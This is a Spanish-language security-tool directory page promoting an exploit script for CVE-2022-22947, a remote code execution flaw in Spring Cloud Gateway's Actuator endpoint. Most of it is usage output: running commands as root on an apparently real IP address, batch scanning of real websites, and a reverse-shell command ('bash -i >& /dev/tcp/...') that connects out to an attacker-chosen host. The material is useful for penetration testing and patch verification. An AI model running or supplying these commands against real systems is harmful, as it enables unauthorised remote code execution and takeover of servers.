Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-22947_EXP — Un script que puede verificar individualmente o en lotes, y también puede generar una reverse shell. | Kitploit
Herramientas/GitHubGitHub/anansec/cve-2022-22947_exp
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubanansec/cve-2022-22947_exp

CVE-2022-22947_EXP

Un script que puede verificar individualmente o en lotes, y también puede generar una reverse shell.

Ver Repositorio
71hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

1. Vulnerabilidad de ejecución remota de código en Spring Cloud Gateway

Nivel de peligro: Alto

Estado de POC/EXP: Público

Número CNVD: CNNVD-2022-16402

Número CVE: CVE-2022-22947

2. Versiones afectadas:

    • VMWare Spring Cloud Gateway 3.1.0
    • VMWare Spring Cloud Gateway >=3.0.0, <=3.0.6
    • VMWare Spring Cloud Gateway <3.0.0

3. Descripción de la vulnerabilidad

Spring Cloud Gateway tiene una vulnerabilidad de ejecución remota de código, que ocurre en el endpoint Actuator de las aplicaciones Spring Cloud Gateway. Cuando está habilitado, expuesto y no seguro, es susceptible a ataques de inyección de código. Un atacante puede explotar esta vulnerabilidad creando de forma maliciosa una solicitud que permita ejecutar código arbitrario en el host remoto.

4. Uso del EXP para CVE-2022-22947

(1) Características del script

  1. Soporta verificación de objetivos individuales.
  2. Soporta verificación masiva de vulnerabilidades.
  3. Soporta reverse shell.

(2) Parámetros del script

root@kitploit:~
-h    Ver ayuda
-u    Especificar la URL del objetivo
-c    Especificar el comando a ejecutar (por defecto: id)
-f    Especificar archivo con URLs objetivo

(3) Uso del script

1. Verificación de un solo objetivo

Método 1:

root@kitploit:~
E:\pocs>python cve-2022-22947.py

    Verificar un solo objetivo:
            1. python cve-2022-22947.py   Tras entrar en modo interactivo, ingresar la URL objetivo y el comando a ejecutar según las indicaciones. Prestar atención a la corrección del comando.
            2. python cve-2022-22947.py  -u http://example.com -c whoami
        Verificar múltiples objetivos:
            1. python cve-2022-22947.py -f url.txt , colocar todas las URLs a verificar en el directorio url.
        Reverse shell:
            1. python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
            2. Entrar en modo interactivo, ingresar el objetivo y el comando para reverse shell.

Ingrese la URL objetivo: http://123.58.236.76:8484
Ingrese el comando a ejecutar (por defecto: id): whoami
[+]Objetivo: http://123.58.236.76:8484 , comando obtenido con éxito: ['root\\n']

Método 2:

root@kitploit:~
E:\learn\python\pocs\pocs>python cve-2022-22947.py -u http://123.58.236.76:8484 -c whoami

    Verificar un solo objetivo:
            1. python cve-2022-22947.py   Tras entrar en modo interactivo, ingresar la URL objetivo y el comando a ejecutar según las indicaciones. Prestar atención a la corrección del comando.
            2. python cve-2022-22947.py  -u http://example.com -c whoami
        Verificar múltiples objetivos:
            1. python cve-2022-22947.py -f url.txt , colocar todas las URLs a verificar en el directorio url.
        Reverse shell:
            1. python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
            2. Entrar en modo interactivo, ingresar el objetivo y el comando para reverse shell.

[+]Objetivo: http://123.58.236.76:8484 , comando obtenido con éxito: ['root\\n']

2. Verificación masiva

root@kitploit:~
E:\learn\python\pocs\pocs>python cve-2022-22947.py -f url.txt

    Verificar un solo objetivo:
            1. python cve-2022-22947.py   Tras entrar en modo interactivo, ingresar la URL objetivo y el comando a ejecutar según las indicaciones. Prestar atención a la corrección del comando.
            2. python cve-2022-22947.py  -u http://example.com -c whoami
        Verificar múltiples objetivos:
            1. python cve-2022-22947.py -f url.txt , colocar todas las URLs a verificar en el directorio url.
        Reverse shell:
            1. python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
            2. Entrar en modo interactivo, ingresar el objetivo y el comando para reverse shell.

[+]Objetivo: http://123.58.236.76:8484 , comando obtenido con éxito: ['uid=0(root']
[+]Objetivo: http://123.58.236.76:8484 , comando obtenido con éxito: ['uid=0(root']
[+]Objetivo: http://123.58.236.76:8484 , comando obtenido con éxito: ['uid=0(root']
[-]Objetivo: http://www.baidu.com, ¡fallo en la verificación de la vulnerabilidad! ¡Verifique manualmente!
[-]Objetivo: http://www.qq.com, ¡fallo en la verificación de la vulnerabilidad! ¡Verifique manualmente!
[+]Objetivo: http://123.58.236.76:8484 , comando obtenido con éxito: ['uid=0(root']

3. Reverse shell

root@kitploit:~
python cve-2022-22947.py -u http://123.58.236.76:8484 -c "bash -i >& /dev/tcp/xxx.xxx.xxx/65534 0>&1"

image-20220519233354807

image-20220519233429912

Descargar herramienta